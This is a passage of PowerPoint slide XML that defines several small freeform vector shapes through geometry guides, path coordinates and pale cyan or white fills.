                    <a:lnTo>
                      <a:pt x="19" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A8D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10624" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2825"/>
                <a:ext cx="17" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 17"/>
                  <a:gd name="T1" fmla="*/ 2 h 65"/>
                  <a:gd name="T2" fmla="*/ 17 w 17"/>
                  <a:gd name="T3" fmla="*/ 2 h 65"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 1 h 65"/>
                  <a:gd name="T6" fmla="*/ 14 w 17"/>
                  <a:gd name="T7" fmla="*/ 1 h 65"/>
                  <a:gd name="T8" fmla="*/ 11 w 17"/>
                  <a:gd name="T9" fmla="*/ 1 h 65"/>
                  <a:gd name="T10" fmla="*/ 9 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 65"/>
                  <a:gd name="T12" fmla="*/ 6 w 17"/>
                  <a:gd name="T13" fmla="*/ 1 h 65"/>
                  <a:gd name="T14" fmla="*/ 2 w 17"/>
                  <a:gd name="T15" fmla="*/ 2 h 65"/>
                  <a:gd name="T16" fmla="*/ 0 w 17"/>
                  <a:gd name="T17" fmla="*/ 3 h 65"/>
                  <a:gd name="T18" fmla="*/ 0 w 17"/>
                  <a:gd name="T19" fmla="*/ 65 h 65"/>
                  <a:gd name="T20" fmla="*/ 0 w 17"/>
                  <a:gd name="T21" fmla="*/ 65 h 65"/>
                  <a:gd name="T22" fmla="*/ 1 w 17"/>
                  <a:gd name="T23" fmla="*/ 65 h 65"/>
                  <a:gd name="T24" fmla="*/ 3 w 17"/>
                  <a:gd name="T25" fmla="*/ 65 h 65"/>
                  <a:gd name="T26" fmla="*/ 6 w 17"/>
                  <a:gd name="T27" fmla="*/ 64 h 65"/>
                  <a:gd name="T28" fmla="*/ 8 w 17"/>
                  <a:gd name="T29" fmla="*/ 64 h 65"/>
                  <a:gd name="T30" fmla="*/ 11 w 17"/>
                  <a:gd name="T31" fmla="*/ 63 h 65"/>
                  <a:gd name="T32" fmla="*/ 14 w 17"/>
                  <a:gd name="T33" fmla="*/ 61 h 65"/>
                  <a:gd name="T34" fmla="*/ 17 w 17"/>
                  <a:gd name="T35" fmla="*/ 58 h 65"/>
                  <a:gd name="T36" fmla="*/ 17 w 17"/>
                  <a:gd name="T37" fmla="*/ 2 h 6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65"/>
                  <a:gd name="T59" fmla="*/ 17 w 17"/>
                  <a:gd name="T60" fmla="*/ 65 h 6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65">
                    <a:moveTo>
                      <a:pt x="17" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BCE5E5"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10625" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2826"/>
                <a:ext cx="14" cy="47"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 47"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 1 h 47"/>
                  <a:gd name="T4" fmla="*/ 13 w 14"/>
                  <a:gd name="T5" fmla="*/ 1 h 47"/>
                  <a:gd name="T6" fmla="*/ 11 w 14"/>
                  <a:gd name="T7" fmla="*/ 1 h 47"/>
                  <a:gd name="T8" fmla="*/ 9 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 47"/>
                  <a:gd name="T10" fmla="*/ 8 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 47"/>
                  <a:gd name="T12" fmla="*/ 6 w 14"/>
                  <a:gd name="T13" fmla="*/ 1 h 47"/>
                  <a:gd name="T14" fmla="*/ 2 w 14"/>
                  <a:gd name="T15" fmla="*/ 1 h 47"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17" fmla="*/ 4 h 47"/>
                  <a:gd name="T18" fmla="*/ 0 w 14"/>
                  <a:gd name="T19" fmla="*/ 47 h 47"/>
                  <a:gd name="T20" fmla="*/ 1 w 14"/>
                  <a:gd name="T21" fmla="*/ 47 h 47"/>
                  <a:gd name="T22" fmla="*/ 1 w 14"/>
                  <a:gd name="T23" fmla="*/ 46 h 47"/>
                  <a:gd name="T24" fmla="*/ 3 w 14"/>
                  <a:gd name="T25" fmla="*/ 46 h 47"/>
                  <a:gd name="T26" fmla="*/ 4 w 14"/>
                  <a:gd name="T27" fmla="*/ 46 h 47"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 44 h 47"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 44 h 47"/>
                  <a:gd name="T32" fmla="*/ 11 w 14"/>
                  <a:gd name="T33" fmla="*/ 43 h 47"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 41 h 47"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 1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47"/>
                  <a:gd name="T59" fmla="*/ 14 w 14"/>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47">
                    <a:moveTo>
                      <a:pt x="14" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D1F2F2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10626" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1232" y="2827"/>
                <a:ext cx="9" cy="27"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
                  <a:gd name="T1" fmla="*/ 1 h 27"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 27"/>
                  <a:gd name="T6" fmla="*/ 7 w 9"/>
                  <a:gd name="T7" fmla="*/ 1 h 27"/>
                  <a:gd name="T8" fmla="*/ 6 w 9"/>
                  <a:gd name="T9" fmla="*/ 0 h 27"/>
                  <a:gd name="T10" fmla="*/ 5 w 9"/>
                  <a:gd name="T11" fmla="*/ 0 h 27"/>
                  <a:gd name="T12" fmla="*/ 3 w 9"/>
                  <a:gd name="T13" fmla="*/ 0 h 27"/>
                  <a:gd name="T14" fmla="*/ 1 w 9"/>
                  <a:gd name="T15" fmla="*/ 1 h 27"/>
                  <a:gd name="T16" fmla="*/ 0 w 9"/>
                  <a:gd name="T17" fmla="*/ 3 h 27"/>
                  <a:gd name="T18" fmla="*/ 0 w 9"/>
                  <a:gd name="T19" fmla="*/ 27 h 27"/>
                  <a:gd name="T20" fmla="*/ 0 w 9"/>
                  <a:gd name="T21" fmla="*/ 27 h 27"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 27 h 27"/>
                  <a:gd name="T24" fmla="*/ 2 w 9"/>
                  <a:gd name="T25" fmla="*/ 27 h 27"/>
                  <a:gd name="T26" fmla="*/ 3 w 9"/>
                  <a:gd name="T27" fmla="*/ 27 h 27"/>
                  <a:gd name="T28" fmla="*/ 5 w 9"/>
                  <a:gd name="T29" fmla="*/ 26 h 27"/>
                  <a:gd name="T30" fmla="*/ 6 w 9"/>
                  <a:gd name="T31" fmla="*/ 26 h 27"/>
                  <a:gd name="T32" fmla="*/ 8 w 9"/>
                  <a:gd name="T33" fmla="*/ 25 h 27"/>
                  <a:gd name="T34" fmla="*/ 9 w 9"/>
                  <a:gd name="T35" fmla="*/ 24 h 27"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 1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27"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                    <a:moveTo>
                      <a:pt x="9" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E5FFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10627" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1343" y="2904"/>
                <a:ext cx="14" cy="13"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 14"/>
                  <a:gd name="T1" fmla="*/ 13 h 13"/>
                  <a:gd name="T2" fmla="*/ 8 w 14"/>
                  <a:gd name="T3" fmla="*/ 13 h 13"/>
                  <a:gd name="T4" fmla="*/ 9 w 14"/>
                  <a:gd name="T5" fmla="*/ 13 h 13"/>
                  <a:gd name="T6" fmla="*/ 10 w 14"/>
                  <a:gd name="T7" fmla="*/ 12 h 13"/>
                  <a:gd name="T8" fmla="*/ 11 w 14"/>
                  <a:gd name="T9" fmla="*/ 11 h 13"/>
                  <a:gd name="T10" fmla="*/ 13 w 14"/>
                  <a:gd name="T11" fmla="*/ 11 h 13"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 10 h 13"/>
                  <a:gd name="T14" fmla="*/ 14 w 14"/>
                  <a:gd name="T15" fmla="*/ 7 h 13"/>
                  <a:gd name="T16" fmla="*/ 14 w 14"/>
                  <a:gd name="T17" fmla="*/ 6 h 13"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 5 h 13"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 4 h 13"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 3 h 13"/>
                  <a:gd name="T24" fmla="*/ 11 w 14"/>
                  <a:gd name="T25" fmla="*/ 2 h 13"/>
                  <a:gd name="T26" fmla="*/ 10 w 14"/>
                  <a:gd name="T27" fmla="*/ 0 h 13"/>
                  <a:gd name="T28" fmla="*/ 9 w 14"/>
                  <a:gd name="T29" fmla="*/ 0 h 13"/>
                  <a:gd name="T30" fmla="*/ 8 w 14"/>
                  <a:gd name="T31" fmla="*/ 0 h 13"/>
                  <a:gd name="T32" fmla="*/ 7 w 14"/>
                  <a:gd name="T33" fmla="*/ 0 h 13"/>
                  <a:gd name="T34" fmla="*/ 6 w 14"/>
                  <a:gd name="T35" fmla="*/ 0 h 13"/>
                  <a:gd name="T36" fmla="*/ 4 w 14"/>
                  <a:gd name="T37" fmla="*/ 0 h 13"/>
                  <a:gd name="T38" fmla="*/ 3 w 14"/>
                  <a:gd name="T39" fmla="*/ 0 h 13"/>
                  <a:gd name="T40" fmla="*/ 2 w 14"/>
                  <a:gd name="T41" fmla="*/ 2 h 13"/>
                  <a:gd name="T42" fmla="*/ 1 w 14"/>
                  <a:gd name="T43" fmla="*/ 3 h 13"/>
                  <a:gd name="T44" fmla="*/ 1 w 14"/>
                  <a:gd name="T45" fmla="*/ 4 h 13"/>
                  <a:gd name="T46" fmla="*/ 0 w 14"/>
                  <a:gd name="T47" fmla="*/ 5 h 13"/>
                  <a:gd name="T48" fmla="*/ 0 w 14"/>
                  <a:gd name="T49" fmla="*/ 6 h 13"/>
                  <a:gd name="T50" fmla="*/ 0 w 14"/>
                  <a:gd name="T51" fmla="*/ 7 h 13"/>
                  <a:gd name="T52" fmla="*/ 1 w 14"/>
                  <a:gd name="T53" fmla="*/ 10 h 13"/>
                  <a:gd name="T54" fmla="*/ 1 w 14"/>
                  <a:gd name="T55" fmla="*/ 11 h 13"/>
                  <a:gd name="T56" fmla="*/ 2 w 14"/>
                  <a:gd name="T57" fmla="*/ 11 h 13"/>
                  <a:gd name="T58" fmla="*/ 3 w 14"/>
                  <a:gd name="T59" fmla="*/ 12 h 13"/>
                  <a:gd name="T60" fmla="*/ 4 w 14"/>
                  <a:gd name="T61" fmla="*/ 13 h 13"/>
                  <a:gd name="T62" fmla="*/ 6 w 14"/>
                  <a:gd name="T63" fmla="*/ 13 h 13"/>
                  <a:gd name="T64" fmla="*/ 7 w 14"/>
                  <a:gd name="T65" fmla="*/ 13 h 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
                  <a:gd name="T100" fmla="*/ 0 h 13"/>
                  <a:gd name="T101" fmla="*/ 14 w 14"/>
                  <a:gd name="T102" fmla="*/ 13 h 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 h="13">
                    <a:moveTo>
                      <a:pt x="7" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10628" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1302" y="2904"/>
                <a:ext cx="7" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 5 w 7"/>
                  <a:gd name="T3" fmla="*/ 6 h 7"/>
                  <a:gd name="T4" fmla="*/ 6 w 7"/>
                  <a:gd name="T5" fmla="*/ 6 h 7"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 5 h 7"/>
                  <a:gd name="T8" fmla="*/ 7 w 7"/>
                  <a:gd name="T9" fmla="*/ 4 h 7"/>
                  <a:gd name="T10" fmla="*/ 6 w 7"/>
                  <a:gd name="T11" fmla="*/ 2 h 7"/>
                  <a:gd name="T12" fmla="*/ 6 w 7"/>
                  <a:gd name="T13" fmla="*/ 2 h 7"/>
                  <a:gd name="T14" fmla="*/ 5 w 7"/>
                  <a:gd name="T15" fmla="*/ 0 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 7"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 7"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 7"/>
                  <a:gd name="T21" fmla="*/ 2 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 7"/>
                  <a:gd name="T23" fmla="*/ 2 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 7"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 7"/>
                  <a:gd name="T27" fmla="*/ 5 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 7"/>
                  <a:gd name="T29" fmla="*/ 6 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 7"/>
                  <a:gd name="T31" fmla="*/ 6 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 7"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10629" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1314" y="2904"/>
                <a:ext cx="5" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 5"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 4 w 5"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 6 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 5"/>
                  <a:gd name="T7" fmla="*/ 5 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 5"/>
                  <a:gd name="T9" fmla="*/ 4 h 7"/>
                  <a:gd name="T10" fmla="*/ 5 w 5"/>
                  <a:gd name="T11" fmla="*/ 3 h 7"/>
                  <a:gd name="T12" fmla="*/ 5 w 5"/>
                  <a:gd name="T13" fmla="*/ 2 h 7"/>
                  <a:gd name="T14" fmla="*/ 4 w 5"/>
                  <a:gd name="T15" fmla="*/ 0 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 5"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 5"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 5"/>
                  <a:gd name="T21" fmla="*/ 2 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 5"/>
                  <a:gd name="T23" fmla="*/ 3 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 5"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 5"/>
                  <a:gd name="T27" fmla="*/ 5 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 5"/>
                  <a:gd name="T29" fmla="*/ 6 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 5"/>
                  <a:gd name="T31" fmla="*/ 7 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 5"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 5 w 5"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
